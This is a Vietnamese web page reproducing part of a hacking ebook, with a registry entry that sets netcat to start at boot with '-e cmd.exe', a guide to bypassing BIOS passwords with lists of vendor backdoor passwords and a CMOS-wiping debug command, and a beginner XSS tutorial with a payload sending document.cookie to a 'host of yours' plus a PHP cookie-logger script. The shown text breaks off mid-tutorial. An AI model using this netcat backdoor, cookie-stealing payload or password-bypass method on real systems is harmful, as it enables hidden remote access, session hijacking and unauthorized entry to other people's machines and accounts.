Hacker Professional Ebook part 30 ppsx

6 313 0
Hacker Professional Ebook part 30 ppsx

Đang tải... (xem toàn văn)

Thông tin tài liệu

CODE Windows Registry Editor Version 5.00 [HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run] "netcat"="\"C:\\nc\\nc.exe\" -L -d -p111 -e cmd.exe" nhoccon1412(VNISS) Các kiến thức hacking cơ bản và cổ điển (bài 2) Tổng hợp Bypass / Crack BIOS Password Trước khi bạn cố gắng bypass hay crack BIOS bạn nên liên hệ với nhà sản xuất phần cứng mà bạn đang sử dụng (MainBoard) để nhận được sự hỗ trợ từ họ và đừng quên hỏi họ làm thế nào để bypass BIOS security. Trong một số trường hợp họ không thể giúp bạn, nhưng ở đây là 1 số phương pháp có thể giúp bạn bypass hay reset password của BIOS: • Backdoor Passwords • Sử dụng phần mềm Cracking Password BIOS • Reset password bằng cách dùng jumpers hay solder beads. • Lấy Pin CMOS ra ngoài ít nhất 10 phút • Một số cách khác • Sử dụng những dịch vụ chuyên nghiệp Backdoor Passwords Nhiều nhà sản xuất phần cứng đã cung cấp những mật khẩu Backdoor để giúp bạn tuy cập đến BIOS setup trong trường hợp bạn quên mất mật khẩu của mình. Chú ý: Một vài BIOS đã thiết lập để khoá hệ thống của bạn nếu bạn đánh password sai trên 3 lần. Vì thế bạn nên đọc tài liệu của nhà sản xuất trước khi bắt đầu đánh password. Award BIOS backdoor passwords: ALFAROME ALLy aLLy aLLY ALLY aPAf _award BIOSTAR CONCAT CONDO Condo d8on djonet HLT KDD Lkwpeter LKWPETER PINT pint SER SKY_FOX ZAAADA ZBAAACAZJAAADC01322222 589589 589721 595595 AWARD_SW AWARD?SW AWARD SW AWARD PW AWKWARD awkward J64 J256 J262 j332 j322 SYXZ syxz shift + syxz TTPTHA 598598 AMI BIOS backdoor passwords: AMI AAAMMMIII BIOS PASSWORD HEWITT RAND AMI?SW AMI_SW LKWPETER A.M.I. CONDO PHOENIX BIOS backdoor passwords: phoenix, PHOENIX, CMOS, BIOS MISC. COMMON PASSWORDS ALFAROME BIOSTAR biostar biosstar CMOS cmos LKWPETER lkwpeter setup SETUP Syxz Wodj OTHER BIOS PASSWORDS BY MANUFACTURER Manufacturer Password VOBIS & IBM merlin Dell Dell Biostar Biostar Compaq Compaq Enox xo11nE Epox central Freetech Posterie IWill iwill Jetway spooml Packard Bell bell9 QDI QDI Siemens SKY_FOX TMC BIGO Toshiba Toshiba TOSHIBA BIOS Một số sản phẩm laptop và desktop của Toshiba sẽ cho phép bạn bypass BIOS Password nếu bạn giữ phím Shift trong suốt qúa trình boot. IBM APTIVA BIOS Click cả chuột phải và trái liên tục trong suốt quá trình Nếu tất cả đều không được bạn có thể sử dụng default passords list: : http://www.phenoelit.de/dpl/dpl.html Ngoài ra, nếu bạn muốn vô hiệu hóa mật khẩu đã cài trong BIOS (để không ai có thể thay đổi phần cấu hình trong BIOS), bạn có thể gõ lệnh debug sau khi vào được trong DOS: C:\>debug -O 70 2f -O 71 ff -Q Sử dụng phần mềm Cracking Password BIOS Dưới đây là 1 số phần mềm dùng để bypass BIOS, chúng có thể được xem là nguy hiểm hoặc là có ích tuỳ theo mức độ. Tuy nhiên tôi khuyên bạn hãy thận trọng khi dùng nó. • http://www.cgsecurity.org/index.html?cmospwd.html • http://www.dewassoc.com/support/bios/bios_password.htm • http://www.majorgeeks.com/download2969.html Reset password bằng cách dùng jumpers hay solder beads. Tắt máy tính, gạt jumper tới vị trí tiếp xúc với mảnh kim loại (có thể bạn sẽ phải cầm tay giữ jumper khi đẩy chúng tiếp xúc với mảnh kim loại). Nhấn nguồn để bật máy tính, khi đó hệ thống của bạn sẽ không thể khởi động được theo cách này nhưng CMOS lại bị xoá hết. Tiếp sau đó, bạn đặt đặt jumper về vị trí mặc định và khởi động lại máy tính bình thường. Trong hầu hết trường hợp, máy tính của bạn sẽ dừng ngay tại màn hình POST và yêu cầu bạn nhấn F1 hoặc một từ khoá nào đó để định lại BIOS về dạng mặc định. Để thực hiện được điều này, từ màn hình BIOS, bạn chỉ cần lưu (save) và thoát (exit) để vào máy tính một cách bình thường, khi đó mật khẩu BIOS đã bị xoá bỏ hoàn toàn. Sau khi đã xóa được RAM CMOS, bạn khởi động máy lại, vào trình Setup để cấu hình lại các thông số đúng cho BIOS. Nếu bạn quên các thông số này, bạn có thể dùng chức năng "Load BIOS default". Lấy Pin CMOS ra ngoài ít nhất 10 phút Bằng cách gỡ pin nuôi CMOS ra khỏi mainboard rồi gắn lại. Tuy nhiên tùy theo loại pin mà có thể sẽ phải dùng mỏ hàn và đòi hỏi phải biết về kỷ thuật hàn mạch điện tử. Một số cách khác * Bằng cách gỡ chip RAM CMOS ra khỏi mainboard 1 thời gian (để các tụ lọc phóng hết điện) rồi gắn lại nếu chip này được gắn trên một đế. * Bằng cách chập mạch các transistor và RAM CMOS trên mainboard (cách nầy không nên làm nếu không biết về điện tử). Sử dụng những dịch vụ chuyên nghiệp Bằng cách gọi 911 hehe, í mà ở Việt Nam cũng có 911 mà, các bạn có thể vào đây để yêu cầu giúp đỡ nhanh chóng nhớ nhé, đừng có gọi lộn 113 thì toi . Good Luck nhoccon1412(VNISS) Các kiến thức hacking cơ bản và cổ điển (bài 3) XSS căn bản Copyright by HCVTeam.net huythanhv2 Ngày nay, trên Internet ko khó để thấy các bug mới về XSS. huythanh thấy ngứa tay ngứa chân khi ko làm được gì nên đã tìm hiểu kĩ về cái này. Vì mới tìm hiểu nên bài này hợp với newbie hơn . Ai copy nhớ cái copyright hộ nhá ** huythanh viết bài này sau khi đã tham khảo wa bài của Mask_NBTA . Hix nhớ bài này lúc trước vương vãi khắp nơi bi giờ tìm mún đỏ con mắt cũng ko có, may là in ra 1 bản rồi . Bài của huythanh sẽ tóm tắt và sửa 1 số lỗi nhỏ trong bài của mask, hix có mấy chỗ mò cả ngày mới ra . Anyway, cho gởi lời cảm ơn đặc biệt đến Mask Đầu tiên ta cần phân biệt là XSS <> CSS, cái nì có nhiều người lộn lắm CSS : Cascading Style Sheets XSS : Cross-Site Scripting *** Dấu hiệu nhận biết site mắc lỗi : Cách thông dụng nhất là chèn script vào các biến truyền trực tiếp trên address, các exploit thường dựa trên cái này Vd : http://sitebixss.com/index.php?act=[chèn xss vào đây] Cái [chèn xss vào đây] thì chẳng thấy ai nói tới cả , chắc ai cũng nghĩ người khác là siêu sao *** Cách chèn script : Ta dùng javascript để chèn vào, trước hết xem qua các hàm sau cho biết sơ sơ đã Bây giờ bạn vào 1 forum đi, vd ibf đi nhá ( thực hành ngay trên HCV cũng được ) Okie, log in vào và thay address bằng đoạn code sau đây, y chang nhá CODE javascript:alert(document.cookie) Thấy gì nào ? Nó sẽ ra có dạng thế này CODE acpcollapseprefs=900,1000,1350; forum_read=a:1:{i:2;i:1122471452;}; session_id=64e939f642a0315bc3fb655f7ef36bf6; member_id=1; pass_hash=c561a5a3859a0df75f76d98ae67bc026 [ Đoạn trên đây thử trên localhost nên các bác đừng thử fake cookie nhe ] Rồi, nói nôm na là thế này, khi address của trình duyệt chính xác là 1 trang nào đó vd hcvteam.net thì lúc đó cookie của hcvteam.net sẽ được lưu tại trình duyệt với tên 1 biến là document.cookie Bây giờ chỉ cần tạo 1 file php để truyền biến này cho nó làm việc, thế là xong CODE javascript:location="http://hostcuaban/cookie.php?cookie="+(document.cookie) Hàm location để chuyển trình duyệt đến 1 trang khác, lưu ý lúc đó document.cookie sẽ thay bằng giá trị cookie, đó là chỗ tui thấy hay nhất. Nếu hiểu được tới đây thì chắc chẳng còn gì để nói . Sau đây là cách exploit. *** Cách exploit : Đầu tiên tạo file cookie.php thế này up lên host của bạn CODE <? /*XSS Exploit */ /*PHP Cookie Saver */ /*Copyright by huythanhv2, HCVTEAM.NET */ $f=fopen("xss.txt","a"); $cook=$HTTP_GET_VARS["cookie"]; fputs($f,$cook.chr(13)); fclose($f); header("location: http://DIACHIDEDUDO.DUDO"); ?> XSS giúp ta steal được cookie của victim, vì thế vd site bị xss thế này CODE

Ngày đăng: 04/07/2014, 11:20

Từ khóa liên quan

Tài liệu cùng người dùng

  • Đang cập nhật ...

Tài liệu liên quan